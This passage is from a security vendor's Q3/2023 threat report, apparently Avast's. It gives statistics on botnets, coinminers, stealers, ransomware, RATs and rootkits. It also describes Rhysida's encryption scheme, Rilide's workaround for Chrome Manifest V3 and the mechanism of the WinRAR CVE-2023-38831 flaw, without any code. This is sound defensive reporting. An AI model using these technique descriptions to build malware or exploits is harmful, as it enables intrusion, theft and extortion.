<p>Financial institutions were the most common target this quarter, presumably due to the potential financial damage and chance of getting significantly better press coverage. As a side-note – they seem to experiment with photo and graphic styles. They started to experiment with the replacement of a photo of a bear with a cartoonish image of a bear stylized as a hoodie-clad hacker (31<sup>st</sup> July) or a member of an army (from the end of September on). </p>
<p>Despite the Qakbot’s takedown, the global risk ratio has slightly increased – partly due to it happening in the middle of the quarter and partly by increased activity of other botnets. We have seen a significant increase in the activity of Tofsee (+41%), Emotet (+25%), and Trickbot (+13%) botnets. As for other families, our telemetry indicates a decline in most of the other families. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1024x404.png" alt="" class="wp-image-7812" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/bot-stats-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding bots in Q3/2023</em></figcaption></figure></div>
<p class="has-text-align-right"><em>Adolf Středa, Malware Researcher</em></p>
<h3 class="wp-block-heading">Coinminers</h3>
<p><em>Coinminers are programs that use a device’s hardware resources to verify cryptocurrency transactions and earn cryptocurrency as compensation. However, in the world of malware, coinminers silently hijack a victim’s computer resources to generate cryptocurrency for an attacker. Regardless of whether a coinminer is legitimate or malware, it’s important to follow our </em><a href="https://support.avast.com/en-eu/article/Threat-Lab-cryptomining-behavior-guideline/" target="_blank" rel="noreferrer noopener"><em>guidelines</em></a><em>.</em> </p>
<p>When compared to last quarter, in Q3/2023 we observed another 4% decrease in the risk ratio in the coinmining space. This is a continuing downward trend for coinmining threats.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7814" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding coinminers in Q3/2023</em></figcaption></figure></div>
<p>During Q3/2023, users in Serbia again faced the highest risk of encountering a coinminer, a regional trend we have seen over the past few quarters. However, with a risk ratio of 4.28%, this is drop in risk by 26% and a record low. A similar situation is seen in other higher-risk countries, including Madagascar with 3.73% risk ratio, Montenegro with 3.29% risk ratio, and Bosnia and Herzegovina with 2.64% risk ratio.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7815" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_coinminer_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for information stealers in Q3/2023</em></figcaption></figure></div>
<p>Unfortunately, the market share increased for XMRig where we measured a 30% increase, now accounting for 23.65% of the total coinmining market share. CoinBitMiner also became more popular, increasing its malware market share by 10%, accounting for 2.02% of the share. Other web miners saw a slight decrease by 5%, now accounting for a combined 61.46% market share. Other strains, such as FakeKMSminer, VMiner, and CoinHelper, experienced rather big decrease in activity, with 27%, 62%, and 29% decrease respectively. </p>
<p>The most common coinminers with their market share in Q2/2023 were: </p>
<ul>
<li>Web miners (61.46%) </li>
<li>XMRig (23.65%) </li>
<li>CoinBitMiner (2.02%) </li>
<li>FakeKMSminer (1.58%) </li>
<li>NeoScrypt (1.03%) </li>
<li>CoinHelper (0.77%) </li>
<li>VMiner (0.73%)</li>
</ul>
<p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
<h3 class="wp-block-heading">Information Stealers</h3>
<p><em>Information stealers are dedicated to stealing anything of value from the victim’s device. Typically, they focus on stored credentials, cryptocurrencies, browser sessions/cookies, browser passwords and private documents.</em> </p>
<p>The common belief that “I have nothing to hide, I don’t need to protect my data” is fundamentally flawed. Even individuals who believe their data lacks value may find out that, at scale, everything may become valuable. This kind of data can be monetized via sales on underground forums, used for further attacks including more targeted scams and phishing (so called <em>spear-phishing</em>), leveraged for blackmailing, and more. Stay safe out there. </p>
<p>In Q3/2023, we observed an overall 6% decrease in information stealers activity in comparison to the previous quarter, slowing down the decreasing trend we have been recently observing. </p>
<p>The biggest change this quarter is that, according to our data, Raccoon Stealer experienced a huge decrease in activity this quarter with a 72% drop in market share. On the other hand, some other strains increased their presence significantly, namely AgentTesla, Fareit, and SnakeKeylogger, balancing the scales.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7816" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em><em>Global risk ratio in Avast’s user base regarding information stealers in Q3/2023</em></em></figcaption></figure></div>
<p>Geographical distribution stayed consistent between Q2 and Q3/2023. Countries where we have more significant userbase having the highest risk ratio are Pakistan (2.47%), Turkey (2.05%), and Egypt (1.90%). Thankfully, the risk ratio in these countries decreased compared to the previous quarter by 5%, 7%, and 14%, respectively. </p>
<p>The biggest increase in risk ratio with regards to information stealers experienced Ukraine (44%), United States (21%), and India (16%).</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7817" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3_malware_infostealer_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>
<p>AgentTesla still holds and further underlined the first place between the most popular information stealers, increasing its market share further by 9%. FormBook, the second-place holder, stayed consistent, increasing its market share by only 0.55%. Fareit, SnakeKeylogger, and Stealc, all experienced an increase in their market share by 11%, 68%, and 4%, respectively. </p>
<p>Fortunately, Raccoon Stealer with its 72% drop in market share was not alone. RedLine and Arkei were both 10% less active in Q3/2023 with regards to market share, along with ViperSoftX dropping by another 7%. </p>
<p>The most common information stealers with their market share in Q3/2023 were: </p>
<ul>
<li>AgentTesla (29.14%) </li>
<li>FormBook (11.39%) </li>
<li>RedLine (5.46%) </li>
<li>Fareit (5.45%) </li>
<li>Lokibot (4.51%) </li>
<li>Arkei (3.96%) </li>
<li>ViperSoftX (2.08%) </li>
<li>Raccoon Stealer (1.95%) </li>
</ul>
<p>It is also worth mentioning new information stealers or their variants, which have displayed a notable surge in activity over the past couple of months. These malicious actors are constantly evolving their tactics to bypass security measures and exfiltrate sensitive data. These often include new techniques that exploit vulnerabilities in both software and human behavior, making it imperative for organizations and individuals to remain vigilant and adopt robust cybersecurity strategies to safeguard their valuable information. </p>
<p>The new version of Rilide Stealer, targeting banking data, was seen to <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/new-rilide-stealer-version-targets-banking-data-and-works-around-google-chrome-manifest-v3/" target="_blank" rel="noreferrer noopener">work around Google Chrome Manifest V3</a>. One of the new features of the Manifest V3 is disabling remote code execution in browser extensions. As a workaround, Rilide Stealer is using inline events along with Declarative Net Requests rules to execute the code remotely and remove the Content Security Policy headers. Since Rilide is being distributed using local loaders on the infected machines, that is without the use of Chrome Web Store, there is no review process involved that would detect this practice. </p>
<p>Furthermore, new connections between Rhadamanthys and Hidden Bee coinminer <a href="https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/" target="_blank" rel="noreferrer noopener">were discovered</a>, providing new insights into the inner workings and implementation details. Another malware, called DarkGate, is a loader with further capabilities like keylogging, cryptocurrency mining, stealing information from browsers, and an overall remote access functionality. Even though the malware can be traced a couple of years back already, it is still undergoing active development, introducing <a href="https://www.malwarebytes.com/blog/news/2023/09/microsoft-teams-used-to-deliver-darkgate-loader-malware" target="_blank" rel="noreferrer noopener">new vectors how to infect victims</a> such as using Microsoft Teams. </p>
<p>Additionally, Lumma, a malware-as-a-service stealer, is also continually gaining in popularity. The malware’s capabilities range from cryptocurrency theft to targeting two-factor authentication (2FA) browser extensions, harvesting banking data, credentials, and more. </p>
<p>Clippers are generally small malicious programs that are used to swap the victim’s clipboard content for content specified by the attacker – in this case, crypto wallet addresses.  Such clippers that have gained popularity in the previous months are, among others, <a href="https://cyble.com/blog/multiple-new-clipper-malware-variants-discovered-in-the-wild/" target="_blank" rel="noreferrer noopener">Atlas Clipper, Keyzetsu Clipper, and KWN Clipper</a>, which are usually leveraging Telegram for command and control communication and offers for purchase.</p>
<p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
<h3 class="wp-block-heading">Ransomware</h3>
<p><em>Ransomware is any type of extorting malware. The most common subtype is the one that encrypts documents, photos, videos, databases, and other files on the victim’s PC. Those files become unusable without decrypting them first. To decrypt the files, attackers demand money, “ransom”, hence the term ransomware.</em> </p>
<p>The prevalence of ransomware is certainly not diminishing. In fact, it is the opposite. According to the research of <a href="https://www.chainalysis.com/blog/crypto-crime-midyear-2023-update-ransomware-scams/" target="_blank" rel="noreferrer noopener">Chainalysis</a>, the total sum of money extorted during the first half of 2023 is about $450 million (compared to $280 million in the first half of 2022). This is caused by a change of tactics of the ransomware operators – they tend to target bigger victims, which brings the possibility of bigger figures paid as ransom. The average payment size for the top strains is as high as $1.7 Million USD (Cl0p ransomware) and $1.5 Million (BlackCat ransomware). </p>
<p>Vulnerabilities in popular third-party applications widely used in companies make attacker’s job easier. We wrote about SQL injection vulnerability in the Progress MOVEit transfer software in the <a href="https://decoded.avast.io/threatresearch/avast-q2-2023-threat-report/" target="_blank" rel="noreferrer noopener">previous Threat Report</a>.  </p>
<p>In addition to encryption of the victim data, ransomware gangs increasingly perform data extortion. Data encryption may be solved if the company has a good data backup policy; data extortion and subsequent leakage of internal documents may be a problem regardless of it. Also, keep in mind that when the ransom is paid, they <a href="https://www.bleepingcomputer.com/news/security/scam-psa-ransomware-gangs-dont-always-delete-stolen-data-when-paid/" target="_blank" rel="noreferrer noopener">don’t always keep the promise of deleting the extorted data</a>. </p>
<p>One of the new ransomware strains that emerged this quarter was Rhysida. <a href="https://twitter.com/malwrhunterteam/status/1658829565215604738" target="_blank" rel="noreferrer noopener">The first mention of the ransomware</a> was in May 2023 and the ransomware leak site already lists about fifty successfully attacked organizations – government, healthcare, IT, municipalities.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="676" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1024x676.png" alt="" class="wp-image-7818" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1024x676.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-300x198.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-768x507.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site-1536x1013.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-leak-site.png 1543w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Rhysida leak site on the dark web</figcaption></figure></div>
<p>The encryptor used by the Rhysida gang is a 32-bit or 64-bit EXE file, compiled with MinGW/GCC 6.3.0 and linked with GNU Linker 2.30. For cryptographic operations, <a href="https://github.com/libtom/libtomcrypt/releases/tag/v1.18.1" target="_blank" rel="noreferrer noopener">LibTomCrypt v 1.18.1</a> is used as crypto library. Files are encrypted by AES cipher in counter mode, the file key and IV are encrypted by RSA-4096 with OAEP padding. </p>
<p>Rhysida wants to be as fast as possible during file encryption: </p>
<ul>
<li><strong>Intermittent Data Encryption</strong>. Not everything is encrypted. For larger files, Rhysida only encrypts a few distinct file blocks. </li>
<li><strong>Multi-threaded encryption</strong>. For every processor, Rhysida created one encryptor thread. All processors in the PC are busy during the encryption process. </li>
</ul>
<p>From the usage of <em>pthreads</em> library, we assume that authors of the Rhysida ransomware wanted to build an encryptor that is also easily portable to other platforms. </p>
<p>Rhysida drops a ransom note file called “CriticalBreachDetected.pdf” into each folder. The following picture shows an example of the ransom note:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="816" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-1024x816.png" alt="" class="wp-image-7819" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-1024x816.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-300x239.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note-768x612.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/rhysida-ransom-note.png 1239w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Content of the ransom note created by Rhysida</figcaption></figure></div>
<p>More information about this ransomware strain can be found in our <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/" target="_blank" rel="noreferrer noopener">blog post</a>. </p>
<p>As usual in every Thread Report, we bring the overview of the risk ratio in our userbase. The following picture shows the riskiest countries (regarding ransomware).</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1024x639.png" alt="" class="wp-image-7820" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-world-map-Q3-2023-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Ransomware risk ratio for Q3/2023</figcaption></figure></div>
<p>The list of countries most at risk of ransomware attacks: </p>
<ul>
<li>Mozambique (0.74%) </li>
<li>Angola (0.44%) </li>
<li>Ghana (0.35%) </li>
<li>Pakistan (0.20%) </li>
</ul>
<p>The most prevalent ransomware strains that we saw and protected against in the list below: </p>
<ul>
<li>WannaCry (19% of ransomware share) </li>
<li>STOP (15%) </li>
<li>Thanatos (3%) </li>
<li>TargetCompany (2%) </li>
<li>LockBit (2%) </li>
<li>Cryptonite (2%) </li>
<li>Enigma (1%) </li>
</ul>
<p>The total risk ratio amongst our user base remains approximately the same:</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1024x404.png" alt="" class="wp-image-7821" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/ransomware-risk-ratio-Q3-2023-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Development of the ransomware threats in our user base</figcaption></figure></div>
<p class="has-text-align-right"><em>Ladislav Zezula, Malware Researche</em>r<br><em>Jakub Křoustek, Malware Research Director</em></p>
<h3 class="wp-block-heading">Remote Access Trojans (RATs)</h3>
<p><em>A Remote Access Trojan (RAT) is a type of malicious software that allows unauthorized individuals to gain remote control over a victim’s computer or device. RATs are typically spread through social engineering techniques, such as phishing emails or infected file downloads. Once installed, RATs grant the attacker complete access to the victim’s device, enabling them to execute various malicious activities, such as spying, data theft, remote surveillance, and even taking control of the victim’s webcam and microphone.</em> </p>
<p>The growing trend of RATs observed in Q2/2023 continues in Q3/2023. Overall, we have seen a slight increase in the risk ratio. The substantial rise of Remcos we reported in Q1 and Q2/2023 seems to have slowed, with Remcos staying around the same numbers as in the previous quarter. However, we are observing a steady growth of the DBatLoader dropper which can deliver Remcos among other payloads.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7822" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/daily_hits_normalized_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding RATs in Q3/2023</em></figcaption></figure></div>
<p>The countries with the highest risk ratio regarding RATs are, as usual, Afghanistan, Iraq and Yemen due to the worm-like behavior of HWorm which seems to be widely spread in these countries. Additionally, we also see njRAT quite active in Iraq and Yemen. Countries with the largest increase in risk ratio are Portugal (148% increase), Poland (55%) and Slovakia (43%) caused by Remcos and in the case of Slovakia also Warzone. The biggest decrease in risk ratio was observed in Czechia (42% decrease), Belgium (34%) and Japan (33%). This is again likely tied to the activity (or for the moment the lack of) of Remcos and Warzone in these countries.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7823" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/map_2023_Q3_malware_rat_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Map showing global risk ratio for RATs in Q3/2023</em></figcaption></figure></div>
<p>The largest increase in market share and number of protected users among the most prevalent RATs in Q3/2023 belongs to NanoCore. Both numbers grew by nearly 100%. Greece, Turkey, and Hungary are the most at risk of this RAT, we have also observed a substantial increase in Brazil, Mexico, and Spain. </p>
<p>Even bigger increase had XWorm which gained more than 400%. However, in total numbers, XWorm is not as widely spread to make it to the top 10 list. </p>
<p>Warzone and AsyncRat had the largest drop in risk ratio among the most prevalent RATs we see. Warzone went down by 27% and AsyncRat by 14% according to our data. </p>
<p>The most prevalent remote access trojan strains in our userbase are: </p>
<ul>
<li>HWorm </li>
<li>Remcos </li>
<li>njRAT </li>
<li>AsyncRat </li>
<li>Warzone </li>
<li>NanoCore </li>
<li>QuasarRAT </li>
<li>Gh0stCringe </li>
<li>DarkComet</li>
<li>Bifrost </li>
</ul>
<p><a href="https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram" target="_blank" rel="noreferrer noopener">Uptycs Threat Research</a> team discovered a new RAT named QwixxRAT, first noticed in early August. The QwixxRAT has a fairly standard set of features including keylogging, information theft (credit cards, browsing history and bookmarks, Steam related data, etc.), spying (webcam, microphone), running commands on infected system and more. It uses Telegram as the C&C channel. </p>
<p>ZenRAT is another RAT which appeared in Q3/2023, reported by <a href="https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm" target="_blank" rel="noreferrer noopener">Proofpoint Emerging Threats</a>. This RAT was found to be bundled with the legitimate password manager Bitwarden on the website bitwariden[.]com. According to the research, ZenRAT is designed to be modular, however according to Proofpoint they only saw one module which seems to be gathering system information. </p>
<p class="has-text-align-right"><em>Ondřej Mokoš, Malware Researcher</em></p>
<h3 class="wp-block-heading">Rootkits</h3>
<p><em>Rootkits are malicious software specifically designed to gain unauthorized access to a system and obtain high-level privileges. Rootkits can operate at the kernel layer of a system, which grants them deep access and control including the ability to modify critical kernel structures. This could enable other malware to manipulate system behavior and evade detection.</em> </p>
<p>The trend of rootkit activity has been stable since the beginning of the year. We can also state that there is still a long-term downward trend. The chart below shows the rootkit activity for the previous three quarters.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="351" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit.png" alt="" class="wp-image-7824" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit.png 890w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01-2023_Q321_malware_rootkit-768x303.png 768w" sizes="(max-width: 890px) 100vw, 890px" /><figcaption class="wp-element-caption"><em>Rootkit risk ratio in Q1/2023 – Q3/2023</em></figcaption></figure></div>
<p>When examining the risk ratio for individual countries, China maintains its leading position regarding the extent of rootkit activities. Although globally, we are observing a decrease in activity, we have seen a particular increase in Ukraine (62%) and in the Russian Federation (62%), specifically the activity increase of the R77RK rootkit.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="890" height="555" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02-map_2023-Q2-Q3.gif" alt="" class="wp-image-7825"/><figcaption class="wp-element-caption"><em>Global risk ratio for rootkits in Q2 and Q3 2023</em></figcaption></figure></div>
<p>In September 2023, an updated version of R77Rootkit (1.5.0) was released, simplifying its deployment on victims’ machines. However, there was no increase in the activity of this rootkit despite the improvements. So, the R77RK is still the malware market leader with the same share (18%) as in the previous quarter. </p>
<p>Around 17% of unidentified strain rootkits are also in the market share, serving as kernel proxies for various activities involving elevated system privileges, such as terminating processes, altering network communications, and registry operations, among others. Compared to the previous quarter, an interesting feature is the increased use of the VMProtect to obfuscate driver functionality. </p>
<p>The third rootkit with the third-largest market share is the Pucmeloun rootkit, whose primary functionality is the modification of network traffic to redirect to different pages. It is a part of other adware that controls web requests on the kernel layer. Adware websites have primarily Chinese content. </p>
<p>The following is the comprehensive list of distinctly recognized Windows rootkit strains, along with their respective market shares: </p>
<ul>
<li>R77Rootkit (18%) </li>
<li>Pucmeloun (13%) </li>
<li>Alureon (7%) </li>
<li>Cerbu (6%) </li>
<li>Perkesh (6%) </li>
</ul>
<p>In terms of Linux kernel rootkits, inspired by Syslogk, the threat actors continue hiding command line backdoors (or bots, depending on how the attacker controls the infected computers) with kernel rootkits that execute those via magic packets (e.g. <a href="https://www.virustotal.com/gui/file/d6e74832bbabca012bc0c3a8a5f1a87cb4b5d241e2a88b75cb01cb0e076b8c98" target="_blank" rel="noreferrer noopener">AntiUnhide</a> rootkit). We continue monitoring Linux kernel rootkits that reuse the code of open-source projects. For instance, <a href="https://www.virustotal.com/gui/file/391304d0ec9b5abd05001a2794d38ad8d1746bf51232fdaf150c67c6ce6957cc" target="_blank" rel="noreferrer noopener">Rocke</a> reuses the code of <a href="https://github.com/f0rb1dd3n/Reptile" target="_blank" rel="noreferrer noopener">Reptile Reptile</a> and hides a secret protected shell that can be spawned via magic packets.  and hides a secret protected shell that can be spawned via magic packets.</p>
<p class="has-text-align-right"><em><em>Martin Chlumecký</em>, Malware Researcher</em><br><em>David Álvarez, Malware Analyst</em></p>
<h3 class="wp-block-heading">Vulnerabilities and Exploits </h3>
<p><em>Exploits take advantage of flaws in legitimate software to perform actions that should not be allowed. They are typically categorized into remote code execution (RCE) exploits, which allow attackers to infect another machine, and local privilege escalation (LPE) exploits, which allow attackers to take more control of a partially infected machine.</em> </p>
<p>WinRAR is not a frequent target of exploits, aside from the occasional path traversals. Our attention was therefore immediately captivated when we first heard about <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" rel="noreferrer noopener">CVE-2023-38831</a>, an easy-to-exploit WinRAR vulnerability, which allows an attacker to craft a malicious archive so that it contains both a benign lure (e.g., an image file) and a malicious payload. When an unsuspecting victim opens such a malicious archive in a vulnerable version of WinRAR and double clicks the lure file, the malicious payload will get executed instead. This is because opening files from inside WinRAR is internally implemented by extracting the target files into a temporary folder and then calling ShellExecute on them. Unfortunately, due to a buggy path normalization, it was possible to redirect the ShellExecute call to target a different file than the one the user clicked on. For a more in-depth look at the exploit, we recommend reading <a href="https://blog.securelayer7.net/analysis-of-cve-2023-38831-zero-day-vulnerability-in-winrar/" target="_blank" rel="noreferrer noopener">this SecureLayer7 analysis</a>.  </p>
